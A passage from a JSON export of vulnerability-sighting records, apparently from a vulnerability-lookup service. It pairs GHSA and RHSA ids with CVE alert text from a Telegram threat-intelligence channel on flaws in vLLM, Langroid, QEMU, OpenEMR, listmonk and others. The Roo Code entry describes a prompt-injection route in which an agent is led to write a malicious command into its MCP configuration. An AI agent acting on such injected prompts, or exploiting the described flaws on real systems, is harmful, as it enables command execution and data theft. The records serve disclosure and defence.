"c753eaae-c50e-43e7-ad48-256539a17d42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFWF-28XR-XW6Q", "type": "seen", "source": "Telegram/Y5Qz_cKDCmo7jQNGBLdJ87dzQSi2eRz7Wqhm7Qv2MeY_FXM", "content": "", "creation_timestamp": "2026-04-24T15:21:22.000000Z"}, {"uuid": "afcb4d3d-80dd-4f18-b662-c557a32d1ba4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-25QR-6MPR-F7QX", "type": "seen", "source": "Telegram/Y5Qz_cKDCmo7jQNGBLdJ87dzQSi2eRz7Wqhm7Qv2MeY_FXM", "content": "", "creation_timestamp": "2026-04-24T15:21:22.000000Z"}, {"uuid": "9d2a416f-6898-4741-807a-f54b860329c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HJQ4-87XH-G4FV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17023", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47277\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: vLLM, an inference and serving engine for large language models (LLMs), has an issue in versions 0.6.5 through 0.8.4 that ONLY impacts environments using the `PyNcclPipe` KV cache transfer integration with the V0 engine. No other configurations are affected. vLLM supports the use of the\u00a0`PyNcclPipe`\u00a0class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the\u00a0`PyNcclCommunicator`\u00a0class, while CPU-side control message passing is handled via the\u00a0`send_obj`\u00a0and\u00a0`recv_obj`\u00a0methods on the CPU side.\u200b The intention was that this interface should only be exposed to a private network using the IP address specified by the `--kv-ip` CLI parameter. The vLLM documentation covers how this must be limited to a secured network. The default and intentional behavior from PyTorch is that the `TCPStore` interface listens on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the `TCPStore` instance to bind its socket to a specified private interface. As of version 0.8.5, vLLM limits the `TCPStore` socket to the private interface as configured.\n\ud83d\udccf Published: 2025-05-20T17:32:27.034Z\n\ud83d\udccf Modified: 2025-05-20T17:32:27.034Z\n\ud83d\udd17 References:\n1. https://github.com/vllm-project/vllm/security/advisories/GHSA-hjq4-87xh-g4fv\n2. https://github.com/vllm-project/vllm/pull/15988\n3. https://github.com/vllm-project/vllm/commit/0d6e187e88874c39cda7409cf673f9e6546893e7\n4. https://docs.vllm.ai/en/latest/deployment/security.html", "creation_timestamp": "2025-05-20T17:43:46.000000Z"}, {"uuid": "3b122083-e812-4301-9579-69b86d9cec54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JQQ5-WC57-F8HJ", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17025", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46724\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Langroid is a Python framework to build large language model (LLM)-powered applications. Prior to version 0.53.15, `TableChatAgent` uses `pandas eval()`. If fed by untrusted user input, like the case of a public-facing LLM application, it may be vulnerable to code injection. Langroid 0.53.15 sanitizes input to `TableChatAgent` by default to tackle the most common attack vectors, and added several warnings about the risky behavior in the project documentation.\n\ud83d\udccf Published: 2025-05-20T17:22:13.475Z\n\ud83d\udccf Modified: 2025-05-20T17:23:50.936Z\n\ud83d\udd17 References:\n1. https://github.com/langroid/langroid/security/advisories/GHSA-jqq5-wc57-f8hj\n2. https://github.com/langroid/langroid/commit/0d9e4a7bb3ae2eef8d38f2e970ff916599a2b2a6", "creation_timestamp": "2025-05-20T17:43:48.000000Z"}, {"uuid": "64fa1a38-8553-4406-8ce1-c4ce3881d5fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4727", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4467\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.\n\ud83d\udccf Published: 2024-07-02T15:57:23.648Z\n\ud83d\udccf Modified: 2025-05-21T01:01:21.498Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4276\n2. https://access.redhat.com/errata/RHSA-2024:4277\n3. https://access.redhat.com/errata/RHSA-2024:4278\n4. https://access.redhat.com/errata/RHSA-2024:4372\n5. https://access.redhat.com/errata/RHSA-2024:4373\n6. https://access.redhat.com/errata/RHSA-2024:4374\n7. https://access.redhat.com/errata/RHSA-2024:4420\n8. https://access.redhat.com/errata/RHSA-2024:4724\n9. https://access.redhat.com/errata/RHSA-2024:4727\n10. https://access.redhat.com/security/cve/CVE-2024-4467\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2278875", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "fd12d924-56ef-4c53-904f-f8a451287e56", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4374", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4467\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.\n\ud83d\udccf Published: 2024-07-02T15:57:23.648Z\n\ud83d\udccf Modified: 2025-05-21T01:01:21.498Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4276\n2. https://access.redhat.com/errata/RHSA-2024:4277\n3. https://access.redhat.com/errata/RHSA-2024:4278\n4. https://access.redhat.com/errata/RHSA-2024:4372\n5. https://access.redhat.com/errata/RHSA-2024:4373\n6. https://access.redhat.com/errata/RHSA-2024:4374\n7. https://access.redhat.com/errata/RHSA-2024:4420\n8. https://access.redhat.com/errata/RHSA-2024:4724\n9. https://access.redhat.com/errata/RHSA-2024:4727\n10. https://access.redhat.com/security/cve/CVE-2024-4467\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2278875", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "078f5a1d-78f8-47e6-9a19-affaa4268b27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4372", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/17098", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-4467\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: A flaw was found in the QEMU disk image utility (qemu-img) 'info' command. A specially crafted image file containing a `json:{}` value describing block devices in QMP could cause the qemu-img process on the host to consume large amounts of memory or CPU time, leading to denial of service or read/write to an existing external file.\n\ud83d\udccf Published: 2024-07-02T15:57:23.648Z\n\ud83d\udccf Modified: 2025-05-21T01:01:21.498Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:4276\n2. https://access.redhat.com/errata/RHSA-2024:4277\n3. https://access.redhat.com/errata/RHSA-2024:4278\n4. https://access.redhat.com/errata/RHSA-2024:4372\n5. https://access.redhat.com/errata/RHSA-2024:4373\n6. https://access.redhat.com/errata/RHSA-2024:4374\n7. https://access.redhat.com/errata/RHSA-2024:4420\n8. https://access.redhat.com/errata/RHSA-2024:4724\n9. https://access.redhat.com/errata/RHSA-2024:4727\n10. https://access.redhat.com/security/cve/CVE-2024-4467\n11. https://bugzilla.redhat.com/show_bug.cgi?id=2278875", "creation_timestamp": "2025-05-21T01:45:15.000000Z"}, {"uuid": "6374f92e-7788-4899-980d-e2bffdc842b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-29QV-4J9F-FJW5", "type": "seen", "source": "Telegram/6_Kzjgs5Jm1YsIV5W18stSaCNyR3ZbpfLU45htDdv-YDitI", "content": "", "creation_timestamp": "2026-04-24T19:22:45.000000Z"}, {"uuid": "d9c4a67e-6e84-4399-900c-f65aee3b0d6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MF88-G2WQ-P7QM", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16875", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-26621\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:H)\n\ud83d\udd39 Description: OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. Prior to version 6.5.2, any user with the capability manage customizations can edit webhook that will execute javascript code. This can be abused to cause a denial of service attack by prototype pollution, making the node js server running the OpenCTI frontend become unavailable. Version 6.5.2 fixes the issue.\n\ud83d\udccf Published: 2025-05-19T16:01:50.419Z\n\ud83d\udccf Modified: 2025-05-19T16:01:50.419Z\n\ud83d\udd17 References:\n1. https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-gq63-jm3h-374p\n2. https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-mf88-g2wq-p7qm", "creation_timestamp": "2025-05-19T16:39:06.000000Z"}, {"uuid": "dc8edadd-0419-49fe-8ffa-4fc26a3aa35f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFJ7-249R-7J2M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19754", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53093\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L)\n\ud83d\udd39 Description: TabberNeue is a MediaWiki extension that allows the wiki to create tabs. Starting in version 3.0.0 and prior to version 3.1.1, any user can insert arbitrary HTMLinto the DOM by inserting a payload into any allowed attribute of the `` tag. Version 3.1.1 contains a patch for the bug.\n\ud83d\udccf Published: 2025-06-27T17:43:24.107Z\n\ud83d\udccf Modified: 2025-06-27T17:43:24.107Z\n\ud83d\udd17 References:\n1. https://github.com/StarCitizenTools/mediawiki-extensions-TabberNeue/security/advisories/GHSA-jfj7-249r-7j2m\n2. https://github.com/StarCitizenTools/mediawiki-extensions-TabberNeue/commit/4cdf217ef96da74a1503d1dd0bb0ed898fc2a612\n3. https://github.com/StarCitizenTools/mediawiki-extensions-TabberNeue/commit/62ce0fcdf32bd3cfa77f92ff6b940459a14315fa\n4. https://github.com/StarCitizenTools/mediawiki-extensions-TabberNeue/blob/3a23b703ce36cfc4128e7921841f68230be4059a/includes/Components/TabberComponentTabs.php#L15-L31\n5. https://github.com/StarCitizenTools/mediawiki-extensions-TabberNeue/blob/3a23b703ce36cfc4128e7921841f68230be4059a/includes/Tabber.php#L76\n6. https://github.com/StarCitizenTools/mediawiki-extensions-TabberNeue/blob/3a23b703ce36cfc4128e7921841f68230be4059a/includes/templates/Tabs.mustache#L1", "creation_timestamp": "2025-06-27T17:56:09.000000Z"}, {"uuid": "29cd3bc1-300b-46ce-8b87-47cdf7be7c52", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQF5-4PQQ-29F5", "type": "published-proof-of-concept", "source": "Telegram/KzwiN8QhKmj3TuqYtGeX9siiyoqjfAY8f7zipbE_z0Wiqhk", "content": "", "creation_timestamp": "2026-04-24T19:23:03.000000Z"}, {"uuid": "3f26b587-22f5-43c8-924b-ec471b56a9d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QVFH-9CJW-8WWQ", "type": "published-proof-of-concept", "source": "Telegram/KzwiN8QhKmj3TuqYtGeX9siiyoqjfAY8f7zipbE_z0Wiqhk", "content": "", "creation_timestamp": "2026-04-24T19:23:03.000000Z"}, {"uuid": "e3e7bfb3-8041-4c3e-8613-0accf923d193", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VFMQ-68HX-4JFW", "type": "published-proof-of-concept", "source": "Telegram/KzwiN8QhKmj3TuqYtGeX9siiyoqjfAY8f7zipbE_z0Wiqhk", "content": "", "creation_timestamp": "2026-04-24T19:23:03.000000Z"}, {"uuid": "a5f21b4a-8a4a-4b60-b670-981ea0f18302", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V5VR-8W3C-37X2", "type": "published-proof-of-concept", "source": "Telegram/KzwiN8QhKmj3TuqYtGeX9siiyoqjfAY8f7zipbE_z0Wiqhk", "content": "", "creation_timestamp": "2026-04-24T19:23:03.000000Z"}, {"uuid": "e8eace5a-20e2-48f8-96bd-e4c219a89b00", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-62MF-VHHW-XMF8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17410", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48376\n\ud83d\udd25 CVSS Score: 3.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to version 9.13.9, a malicious SuperUser (Host) could craft a request to use an external url for a site export to then be imported. Version 9.13.9 fixes the issue.\n\ud83d\udccf Published: 2025-05-23T15:37:03.832Z\n\ud83d\udccf Modified: 2025-05-23T15:37:03.832Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-62mf-vhhw-xmf8\n2. https://github.com/dnnsoftware/Dnn.Platform/commit/13fb13ee76173c3467d7ee8d120b20ca7bd4fa63", "creation_timestamp": "2025-05-23T15:44:43.000000Z"}, {"uuid": "990d5857-8d03-4689-8aff-0047169cd3b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2067", "type": "seen", "source": "Telegram/4zRGsEPwCWPOVkiJwGYn1R_sXuEnR_EKMT0DdgACfDkyyoA", "content": "", "creation_timestamp": "2026-04-20T21:21:38.000000Z"}, {"uuid": "d4535dca-07ba-480c-9b4f-29db1017b64f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:9922", "type": "seen", "source": "Telegram/4zRGsEPwCWPOVkiJwGYn1R_sXuEnR_EKMT0DdgACfDkyyoA", "content": "", "creation_timestamp": "2026-04-20T21:21:38.000000Z"}, {"uuid": "bdcf33bd-7a1d-47bc-a060-ecfa19dc87e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FG79-CR9C-7369", "type": "seen", "source": "Telegram/itZIvBa41gHmxLOZ4e3ooVdAvJm4yIE4KZd9_P4HVJMq_4o", "content": "", "creation_timestamp": "2026-04-20T21:21:58.000000Z"}, {"uuid": "d908f276-94f6-46e4-9164-bebf3982c0d2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2XV9-GHH9-XC69", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17604", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48054\n\ud83d\udd25 CVSS Score: 6.8 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Radashi is a TypeScript utility toolkit. Prior to version 12.5.1, the set function within the Radashi library is vulnerable to prototype pollution. If an attacker can control parts of the path argument to the set function, they could potentially modify the prototype of all objects in the JavaScript runtime, leading to unexpected behavior, denial of service, or even remote code execution in some specific scenarios. This issue has been patched in version 12.5.1. A workaround for this issue involves sanitizing the path argument provided to the set function to ensure that no part of the path string is __proto__, prototype, or constructor.\n\ud83d\udccf Published: 2025-05-27T04:04:13.029Z\n\ud83d\udccf Modified: 2025-05-27T04:04:13.029Z\n\ud83d\udd17 References:\n1. https://github.com/radashi-org/radashi/security/advisories/GHSA-2xv9-ghh9-xc69\n2. https://github.com/radashi-org/radashi/commit/8147abc8cfc3cfe9b9a17cd389076a5d97235a66", "creation_timestamp": "2025-05-27T04:47:52.000000Z"}, {"uuid": "b6409392-d6d9-45fe-be0a-0eee0772c84f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-79M3-RVX2-3QQ9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17408", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48377\n\ud83d\udd25 CVSS Score: 6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N)\n\ud83d\udd39 Description: DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to version 9.13.9, a specially crafted URL may be constructed which can inject an XSS payload that is triggered by using some module actions. Version 9.13.9 fixes the issue.\n\ud83d\udccf Published: 2025-05-23T15:39:40.020Z\n\ud83d\udccf Modified: 2025-05-23T15:39:40.020Z\n\ud83d\udd17 References:\n1. https://github.com/dnnsoftware/Dnn.Platform/security/advisories/GHSA-79m3-rvx2-3qq9\n2. https://github.com/dnnsoftware/Dnn.Platform/commit/351b166492ad4b6509c273dc83211d52238e31a7", "creation_timestamp": "2025-05-23T15:44:33.000000Z"}, {"uuid": "318b17a1-737d-4ee4-a927-7473931bcf69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2H9P-7VMC-WMQV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17411", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-43860\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N)\n\ud83d\udd39 Description: OpenEMR is a free and open source electronic health records and medical practice management application. A stored cross-site scripting (XSS) vulnerability in versions prior to 7.0.3.4 allows any authenticated user with patient creation and editing privileges to inject arbitrary JavaScript code into the system by entering malicious payloads in the (1) Text Box fields of Address, Address Line 2, Postal Code and City fields  and (2) Drop Down menu options of Address Use, State and Country of the Additional Addresses section of the Contact tab in Patient Demographics. The injected script can execute in two scenarios: (1) dynamically during form input, and (2) when the form data is later loaded for editing. Version 7.0.3.4 contains a patch for the issue.\n\ud83d\udccf Published: 2025-05-23T15:35:01.087Z\n\ud83d\udccf Modified: 2025-05-23T15:35:01.087Z\n\ud83d\udd17 References:\n1. https://github.com/openemr/openemr/security/advisories/GHSA-2h9p-7vmc-wmqv", "creation_timestamp": "2025-05-23T15:44:49.000000Z"}, {"uuid": "9832a3c1-fff1-406f-a276-e288edab4ca4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HCXX-MP6G-6GR9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17653", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2018-16153\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: An issue was discovered in Apereo Opencast 4.x through 10.x before 10.6. It sends system digest credentials during authentication attempts to arbitrary external services in some situations.\n\ud83d\udccf Published: 2023-12-12T00:00:00.000Z\n\ud83d\udccf Modified: 2025-05-27T14:35:51.213Z\n\ud83d\udd17 References:\n1. https://www.apereo.org/projects/opencast/news\n2. https://github.com/advisories/GHSA-hcxx-mp6g-6gr9\n3. https://github.com/opencast/opencast/commit/776d5588f39c61eb04c03bb955416c4f77629d51\n4. https://docs.opencast.org/r/10.x/admin/#changelog", "creation_timestamp": "2025-05-27T14:48:50.000000Z"}, {"uuid": "03aab281-6147-4894-b4ad-2c95dec2e7a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3F2-MC85-67GC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17414", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48375\n\ud83d\udd25 CVSS Score: 6.6 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Schule is open-source school management system software. Prior to version 1.0.1, the file forgot_password.php (or equivalent endpoint responsible for email-based OTP generation) lacks proper rate limiting controls, allowing attackers to abuse the OTP request functionality. This vulnerability can be exploited to send an excessive number of OTP emails, leading to potential denial-of-service (DoS) conditions or facilitating user harassment through email flooding. Version 1.0.1 fixes the issue.\n\ud83d\udccf Published: 2025-05-23T15:41:11.735Z\n\ud83d\udccf Modified: 2025-05-23T16:09:49.204Z\n\ud83d\udd17 References:\n1. https://github.com/schule111/Schule/security/advisories/GHSA-h3f2-mc85-67gc", "creation_timestamp": "2025-05-23T16:45:03.000000Z"}, {"uuid": "73b7f6e1-fa28-4715-9ae7-84815cd6d2dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HV3X-4W38-R92M", "type": "published-proof-of-concept", "source": "Telegram/9Djs_e05P71eOqOBKGWSEvRis3v2yPmwIHyqqWc98-IGQuI", "content": "", "creation_timestamp": "2026-04-20T23:18:29.000000Z"}, {"uuid": "dc7153e4-794b-43ab-9283-0b38b852e034", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X234-X5VQ-CC2V", "type": "published-proof-of-concept", "source": "Telegram/9Djs_e05P71eOqOBKGWSEvRis3v2yPmwIHyqqWc98-IGQuI", "content": "", "creation_timestamp": "2026-04-20T23:18:29.000000Z"}, {"uuid": "4163dea7-8006-49ff-a478-16eb6ed6851e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5X8H-M52G-5V54", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19791", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53098\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\ud83d\udd39 Description: Roo Code is an AI-powered autonomous coding agent. The project-specific MCP configuration for the Roo Code agent is stored in the `.roo/mcp.json` file within the VS Code workspace. Because the MCP configuration format allows for execution of arbitrary commands, prior to version 3.20.3, it would have been possible for an attacker with access to craft a prompt to ask the agent to write a malicious command to the MCP configuration file. If the user had opted-in to auto-approving file writes within the project, this would have led to arbitrary command execution. This issue is of moderate severity, since it requires the attacker to already be able to submit prompts to the agent (for instance through a prompt injection attack), for the user to have MCP enabled (on by default), and for the user to have enabled auto-approved file writes (off by default). Version 3.20.3 fixes the issue by adding an additional layer of opt-in configuration for auto-approving writing to Roo's configuration files, including all files within the `.roo/` folder.\n\ud83d\udccf Published: 2025-06-27T21:43:35.031Z\n\ud83d\udccf Modified: 2025-06-27T21:43:35.031Z\n\ud83d\udd17 References:\n1. https://github.com/RooCodeInc/Roo-Code/security/advisories/GHSA-5x8h-m52g-5v54\n2. https://github.com/RooCodeInc/Roo-Code/commit/7d0b22f9e659dc6c26aab0bacbea27874986e772", "creation_timestamp": "2025-06-27T21:55:02.000000Z"}, {"uuid": "3ff534f7-5ce3-47d7-a3ef-1978d529dd12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-69RW-45WJ-G4V6", "type": "published-proof-of-concept", "source": "Telegram/9Djs_e05P71eOqOBKGWSEvRis3v2yPmwIHyqqWc98-IGQuI", "content": "", "creation_timestamp": "2026-04-20T23:18:29.000000Z"}, {"uuid": "f9e66be1-a4ae-4ae1-9b6c-a06f59ee3e76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X3J7-7PGJ-H87R", "type": "published-proof-of-concept", "source": "Telegram/9Djs_e05P71eOqOBKGWSEvRis3v2yPmwIHyqqWc98-IGQuI", "content": "", "creation_timestamp": "2026-04-20T23:18:29.000000Z"}, {"uuid": "3ff52a96-8367-48a3-8e9a-173128d2a923", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JC7G-X28F-3V3H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/17703", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49136\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: listmonk is a standalone, self-hosted, newsletter and mailing list manager. Starting in version 4.0.0 and prior to version 5.0.2, the `env` and `expandenv` template functions which is enabled by default in Sprig enables capturing of env variables on host. While this may not be a problem on single-user (super admin) installations, on multi-user installations, this allows non-super-admin users with campaign or template permissions to use the `{{ env }}` template expression to capture sensitive environment variables. Users should upgrade to v5.0.2 to mitigate the issue.\n\ud83d\udccf Published: 2025-06-09T16:21:48.266Z\n\ud83d\udccf Modified: 2025-06-09T16:21:48.266Z\n\ud83d\udd17 References:\n1. https://github.com/knadh/listmonk/security/advisories/GHSA-jc7g-x28f-3v3h\n2. https://github.com/knadh/listmonk/commit/d27d2c32cf3af2d0b24e29ea5a686ba149b49b3e\n3. https://github.com/knadh/listmonk/releases/tag/v5.0.2", "creation_timestamp": "2025-06-09T16:56:04.000000Z"}, {"uuid": "e3fa299e-c2b5-46ee-8e34-fbe35be8165d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3C27-2M7H-F7RX", "type": "published-proof-of-concept", "source": 